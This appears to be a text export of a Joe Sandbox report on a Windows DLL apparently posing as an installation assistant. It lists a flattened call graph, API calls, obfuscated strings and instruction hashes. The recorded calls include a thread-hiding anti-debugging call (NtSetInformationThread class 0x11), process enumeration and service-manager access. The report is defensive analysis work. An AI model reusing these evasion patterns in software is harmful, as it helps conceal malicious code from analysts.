6c9dbb78 __wsopen_s 100721->100723 100722 6c9dbb80 __dosmaperr 100722->100698 100723->100722 100724 6c9dbc33 __dosmaperr 100723->100724 100725 6c9dbbca 
100723->100725 100762 6c9d0120 18 API calls __cftoe 100724->100762 100732 6c9e1990 EnterCriticalSection 100725->100732 100727 6c9dbbd0 100730 6c9dbbec __dosmaperr 100727->100730 100733 6c9dbc5e 100727->100733 100761 6c9dbc2b LeaveCriticalSection __wsopen_s 100730->100761 100732->100727 100734 6c9dbc80 100733->100734 100760 6c9dbc9c __dosmaperr 100733->100760 100735 6c9dbcd4 100734->100735 100737 6c9dbc84 __dosmaperr 100734->100737 100736 6c9dbce7 100735->100736 100771 6c9dac69 20 API calls __wsopen_s 100735->100771 100763 6c9dbe40 100736->100763 100770 6c9d0120 18 API calls __cftoe 100737->100770 100742 6c9dbcfd 100746 6c9dbd26 100742->100746 100747 6c9dbd01 100742->100747 100743 6c9dbd3c 100744 6c9dbd95 WriteFile 100743->100744 100745 6c9dbd50 100743->100745 100748 6c9dbdb9 GetLastError 100744->100748 100744->100760 100750 6c9dbd5b 100745->100750 100751 6c9dbd85 100745->100751 100773 6c9dbeb1 43 API calls 5 library calls 100746->100773 100747->100760 100772 6c9dc25b 6 API calls __wsopen_s 100747->100772 100748->100760 100752 6c9dbd75 100750->100752 100753 6c9dbd60 100750->100753 100776 6c9dc2c3 7 API calls 2 library calls 100751->100776 100775 6c9dc487 8 API calls 3 library calls 100752->100775 100756 6c9dbd65 100753->100756 100753->100760 100774 6c9dc39e 7 API calls 2 library calls 100756->100774 100758 6c9dbd73 100758->100760 100760->100730 100761->100722 100762->100722 100764 6c9e19e5 __wsopen_s 18 API calls 100763->100764 100766 6c9dbe51 100764->100766 100765 6c9dbcf8 100765->100742 100765->100743 100766->100765 100767 6c9d49b2 __Getctype 37 API calls 100766->100767 100768 6c9dbe74 100767->100768 100768->100765 100769 6c9dbe8e GetConsoleMode 100768->100769 100769->100765 100770->100760 100771->100736 100772->100760 100773->100760 100774->100758 100775->100758 100776->100758 100777->100704 100778->100711 100780 6c9db9cd __wsopen_s 100779->100780 100788 6c9e1990 EnterCriticalSection 100780->100788 100782 6c9db9db 100784 6c9dba08 100782->100784 100789 6c9db925 
100782->100789 100802 6c9dba41 LeaveCriticalSection __wsopen_s 100784->100802 100786 6c9dba2a 100786->100717 100787->100717 100788->100782 100803 6c9e15a2 100789->100803 100791 6c9db935 100792 6c9db93b 100791->100792 100793 6c9db96d 100791->100793 100795 6c9e15a2 __wsopen_s 18 API calls 100791->100795 100808 6c9e171f SetStdHandle __dosmaperr __wsopen_s 100792->100808 100793->100792 100796 6c9e15a2 __wsopen_s 18 API calls 100793->100796 100797 6c9db964 100795->100797 100798 6c9db979 CloseHandle 100796->100798 100800 6c9e15a2 __wsopen_s 18 API calls 100797->100800 100798->100792 100801 6c9db985 GetLastError 100798->100801 100799 6c9db993 __dosmaperr 100799->100784 100800->100793 100801->100792 100802->100786 100804 6c9e15af __dosmaperr 100803->100804 100806 6c9e15c4 __dosmaperr 100803->100806 100804->100791 100805 6c9e15e9 100805->100791 100806->100805 100807 6c9d0120 __cftoe 18 API calls 100806->100807 100807->100804 100808->100799 100809->100402 100810->100404 100811->100406 100813 6c9c65dc 100812->100813 100814 6c9c6608 100812->100814 100828 6c9c6601 100813->100828 100835 6c892250 30 API calls 100813->100835 100820 6c9c6619 100814->100820 100833 6c893560 32 API calls std::_Xinvalid_argument 100814->100833 100817 6c9c67e8 100836 6c892340 24 API calls 100817->100836 100819 6c9c67f7 100837 6c9c9379 RaiseException 100819->100837 100820->100828 100834 6c892f60 42 API calls 4 library calls 100820->100834 100824 6c9c6827 100839 6c892340 24 API calls 100824->100839 100826 6c9c683d 100840 6c9c9379 RaiseException 100826->100840 100828->100416 100829 6c9c6653 100829->100828 100838 6c892250 30 API calls 100829->100838 100830->100416 100831->100416 100832->100416 100833->100820 100834->100829 100835->100817 100836->100819 100837->100829 100838->100824 100839->100826 100840->100828 100841->100422 100842->100424 100843->100422 100844->100422 100845->100422 100847 6c89022e 100846->100847 100848 6c8904d6 100847->100848 100853 6c9d17db 100847->100853 100848->100434 100850->100435 
100851->100437 100852->100439 100854 6c9d17e9 100853->100854 100855 6c9d1806 100853->100855 100854->100855 100856 6c9d180a 100854->100856 100857 6c9d17f6 100854->100857 100855->100847 100861 6c9d1a02 100856->100861 100869 6c9d0120 18 API calls __cftoe 100857->100869 100862 6c9d1a0e __wsopen_s 100861->100862 100870 6c9cc5a9 EnterCriticalSection 100862->100870 100864 6c9d1a1c 100871 6c9d19bf 100864->100871 100868 6c9d183c 100868->100847 100869->100855 100870->100864 100879 6c9d85a6 100871->100879 100877 6c9d19f9 100878 6c9d1a51 LeaveCriticalSection 100877->100878 100878->100868 100880 6c9d9c60 18 API calls 100879->100880 100881 6c9d85b7 100880->100881 100896 6c9e19e5 100881->100896 100883 6c9d19d3 100886 6c9d183e 100883->100886 100884 6c9d85bd __wsopen_s 100884->100883 100901 6c9d47bb HeapFree GetLastError _free 100884->100901 100887 6c9d1850 100886->100887 100890 6c9d186e 100886->100890 100888 6c9d185e 100887->100888 100887->100890 100893 6c9d1886 _Yarn 100887->100893 100903 6c9d0120 18 API calls __cftoe 100888->100903 100895 6c9d8659 62 API calls 100890->100895 100891 6c9d0cb9 62 API calls 100891->100893 100892 6c9d9c60 18 API calls 100892->100893 100893->100890 100893->100891 100893->100892 100894 6c9dbb6c __wsopen_s 62 API calls 100893->100894 100894->100893 100895->100877 100897 6c9e19f2 100896->100897 100899 6c9e19ff 100896->100899 100897->100884 100898 6c9e1a0b 100898->100884 100899->100898 100902 6c9d0120 18 API calls __cftoe 100899->100902 100901->100883 100902->100897 100903->100890 100904->100456 100905->100458 100906->100460 100907->100356 100908->100364 100909->100366 100910->100359 100911->100362 100912 6c9cef3f 100913 6c9cef4b __wsopen_s 100912->100913 100914 6c9cef5f 100913->100914 100915 6c9cef52 GetLastError ExitThread 100913->100915 100924 6c9d49b2 GetLastError 100914->100924 100920 6c9cef7b 100958 6c9ceeaa 16 API calls 2 library calls 100920->100958 100923 6c9cef9d 100925 6c9d49c9 100924->100925 100926 6c9d49cf 100924->100926 100959 6c9d6b23 6 API 
calls std::_Lockit::_Lockit 100925->100959 100930 6c9d49d5 SetLastError 100926->100930 100960 6c9d6b62 6 API calls std::_Lockit::_Lockit 100926->100960 100929 6c9d49ed 100929->100930 100931 6c9d49f1 100929->100931 100937 6c9d4a69 100930->100937 100938 6c9cef64 100930->100938 100961 6c9d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100931->100961 100933 6c9d49fd 100935 6c9d4a1c 100933->100935 100936 6c9d4a05 100933->100936 100964 6c9d6b62 6 API calls std::_Lockit::_Lockit 100935->100964 100962 6c9d6b62 6 API calls std::_Lockit::_Lockit 100936->100962 100967 6c9d0ac9 37 API calls std::locale::_Setgloballocale 100937->100967 100952 6c9d9d66 100938->100952 100942 6c9d4a13 100963 6c9d47bb HeapFree GetLastError _free 100942->100963 100944 6c9d4a28 100945 6c9d4a3d 100944->100945 100946 6c9d4a2c 100944->100946 100966 6c9d47bb HeapFree GetLastError _free 100945->100966 100965 6c9d6b62 6 API calls std::_Lockit::_Lockit 100946->100965 100949 6c9d4a19 100949->100930 100951 6c9d4a4f 100951->100930 100953 6c9d9d78 GetPEB 100952->100953 100954 6c9cef6f 100952->100954 100953->100954 100955 6c9d9d8b 100953->100955 100954->100920 100957 6c9d6d6f 5 API calls std::_Lockit::_Lockit 100954->100957 100968 6c9d6e18 5 API calls std::_Lockit::_Lockit 100955->100968 100957->100920 100958->100923 100959->100926 100960->100929 100961->100933 100962->100942 100963->100949 100964->100944 100965->100942 100966->100951 100968->100954 100969 6c843d62 100971 6c843bc0 100969->100971 100970 6c843e8a GetCurrentThread NtSetInformationThread 100972 6c843eea 100970->100972 100971->100970 100973 6c844b53 100974 6c9c6a43 std::_Facet_Register 4 API calls 100973->100974 100975 6c844b5c _Yarn 100974->100975 100976 6c9baec0 2 API calls 100975->100976 100981 6c844bae std::ios_base::_Ios_base_dtor 100976->100981 100977 6c86639e 101164 6c9d0130 18 API calls 2 library calls 100977->101164 100979 6c844cff 100980 6c845164 CreateFileA CloseHandle 100985 6c8451ec 
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 5753fe82e663555d26618337d45ed783baa6bc9002bd3a4f142ae4c8287a9f8d
                              • Instruction ID: c37e37f9a5d207089a7c271f5c8aa9bd8b33bf74d12aa5421bd7300819d1ceb9
                              • Opcode Fuzzy Hash: 5753fe82e663555d26618337d45ed783baa6bc9002bd3a4f142ae4c8287a9f8d
                              • Instruction Fuzzy Hash: C9741531644B068FC738CF28C9D0A95B7E3EF95318B59CE2DC0A68BA55E774B54ACB40
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: c2f78f6d4649577d3ad6ac76cb98e9e49b91f7164b7d4cfa98d8e50f7caf5917
                              • Instruction ID: 5d650607bffae1e45f3b3ed6245561171a644e61ceefd0a72d703a4bf72d480e
                              • Opcode Fuzzy Hash: c2f78f6d4649577d3ad6ac76cb98e9e49b91f7164b7d4cfa98d8e50f7caf5917
                              • Instruction Fuzzy Hash: 9B3447716447018FC738CF28C9D0A96B7E3EF95318B998E6DC0A64BB45E7B4B51ACB40

                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C9C524E
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction ID: 31be1f0ca3d4bbeda6367e29f6c68350a6e0a1da20f010e9946151cd36c066b4
                              • Opcode Fuzzy Hash: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction Fuzzy Hash: A6315A74608341DFD710AF28C888B1ABBF8AF9A748F90492EE498D7760D371D9499B53

                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 244230555eef82cb4696f4d7bae6a196d93a95c86bf71847ce6df1978ce7b198
                              • Instruction ID: f2a63c24c0199f17716db9275b25eba23e40ef1b1acf77c6e9f97e44f71c9d1c
                              • Opcode Fuzzy Hash: 244230555eef82cb4696f4d7bae6a196d93a95c86bf71847ce6df1978ce7b198
                              • Instruction Fuzzy Hash: 8432E132245B058FC334CF28C9C0695B7E3EFD1314B69CE6DC0AA4BA95D775B84A8B50

                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 0bffeff137d34e99148fd098f05be2e63931f8705cd20c078e395f97ad5b0e67
                              • Instruction ID: 22ff7787122639e43f034ecbbb92bc582a06f3c4b36210911af70e182d90ab40
                              • Opcode Fuzzy Hash: 0bffeff137d34e99148fd098f05be2e63931f8705cd20c078e395f97ad5b0e67
                              • Instruction Fuzzy Hash: 0851DE31145B098FC3308F28C980795B7A3BFE6314F69CE5DC0E61BA95DB75B94A8B41
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: fbcb66aee56cddae52140ef18b06093d8e165a9d8063fc8ebe22021a50683871
                              • Instruction ID: 6e04b7dca432b968c72206369651328e8d3666cfc9089c52c2d7bd03b78e5340
                              • Opcode Fuzzy Hash: fbcb66aee56cddae52140ef18b06093d8e165a9d8063fc8ebe22021a50683871
                              • Instruction Fuzzy Hash: 0451EE31105B098BC330CF28C580796B7A3BFD6314F69CE5DC0E65BA95DB70B94A8B90
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 7472dbbd4e151a47be212979a1abfc56234cb8e942e98705e52eab01cc631e8d
                              • Instruction ID: ed790f80eea3cd6e35f54039665b77fced540173c70f2162d72367af7fd491ea
                              • Opcode Fuzzy Hash: 7472dbbd4e151a47be212979a1abfc56234cb8e942e98705e52eab01cc631e8d
                              • Instruction Fuzzy Hash: 8D310131145B09CBD330CF28C9847C6B7A3BFE6314F298E1DC0A65BA80DB74B80A8B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 1eabbf8a7b7c68cc41f9b5f3ebfa3bb84c399d155f8f897f25f699a86dc85882
                              • Instruction ID: dc9a4fcad26ee582619bbe2309212c3004303c9019aacba6b08563165057b3c2
                              • Opcode Fuzzy Hash: 1eabbf8a7b7c68cc41f9b5f3ebfa3bb84c399d155f8f897f25f699a86dc85882
                              • Instruction Fuzzy Hash: DE31F131104B09CBD734CF28C590796B7A7BF96308F298E1DC0E65BA85DB71B945CB51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 5681025bd2a68d4813872677f7cf530a3d5e55fb3b05b570a0914ff541e6e245
                              • Instruction ID: b5d371d2f6347097df7b3f6cee66765a4ed6f64425a92012988191d2dcf5a6aa
                              • Opcode Fuzzy Hash: 5681025bd2a68d4813872677f7cf530a3d5e55fb3b05b570a0914ff541e6e245
                              • Instruction Fuzzy Hash: DD210630118B09CBD738CF24C990796B7B7BF96305F28CE1DC0A64BA90DB75B9058B51
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9C5130
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction ID: d96f5da85b9ebabdf3bac4c8cd9972c911bb35ed213589f2f54260a95ac5b772
                              • Opcode Fuzzy Hash: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction Fuzzy Hash: AF312AB4608342EFC7108F28C588B4ABBF4EB89754F51895EF888C6361C371CA45AB57
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C9BAEDC
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction ID: 983fd6d54fcf1ef04a82ae5d0795ff54252ee96e0d1ed7b2e4dcd8f04c0fb461
                              • Opcode Fuzzy Hash: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction Fuzzy Hash: 651166B0408341AFD7108B28D54449FBBE8BF86314F648E59F0A8DB690DB34CC948B26
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C99ABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 934b7a4b53755c99f40fbb712f8fa55d32d0ee4972dc5c820e474d55cf43c50f
                              • Instruction ID: 9eadeac6ee753d295c716114c2fc81d1c0d68b4fbf5c9e7661db9de53e729ec5
                              • Opcode Fuzzy Hash: 934b7a4b53755c99f40fbb712f8fa55d32d0ee4972dc5c820e474d55cf43c50f
                              • Instruction Fuzzy Hash: 38624870A0D3818FC724CF18D490A5ABBF2ABDA314F288D1EE999CB751DB35D9458B43

                              Control-flow Graph
                              • Graph rendering not recoverable from the text export (executed / not-executed block shading lost); function starting at 6c9dcad3, whose blocks call ReadFile, GetConsoleMode, ReadConsoleW and GetLastError
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: c4056ebb1487898439a28177263355ba7c2fe56b4fc2e55b161e370ef4d393c4
                              • Instruction ID: 01fb819b5a7fc42ae9a91ce59c52a9a9083576eb55932a2ec9a1077ca7a5c318
                              • Opcode Fuzzy Hash: c4056ebb1487898439a28177263355ba7c2fe56b4fc2e55b161e370ef4d393c4
                              • Instruction Fuzzy Hash: 51C1E870A04B4A9FDF05DFA8C880BADBBB4AF5A318F218159E410B7781C774E945CF61

                              Control-flow Graph
                              • Graph rendering not recoverable from the text export (executed / not-executed block shading lost); function starting at 6c9e406c, whose blocks call GetFileType, GetLastError and CloseHandle
                              APIs
                                • Part of subcall function 6C9E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C9E4115,?,?,00000000,?,6C9E4115,00000000,0000000C), ref: 6C9E4474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E4180
                              • __dosmaperr.LIBCMT ref: 6C9E4187
                              • GetFileType.KERNEL32(00000000), ref: 6C9E4193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E419D
                              • __dosmaperr.LIBCMT ref: 6C9E41A6
                              • CloseHandle.KERNEL32(00000000), ref: 6C9E41C6
                              • CloseHandle.KERNEL32(6C9DB0D0), ref: 6C9E4313
                              • GetLastError.KERNEL32 ref: 6C9E4345
                              • __dosmaperr.LIBCMT ref: 6C9E434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmp
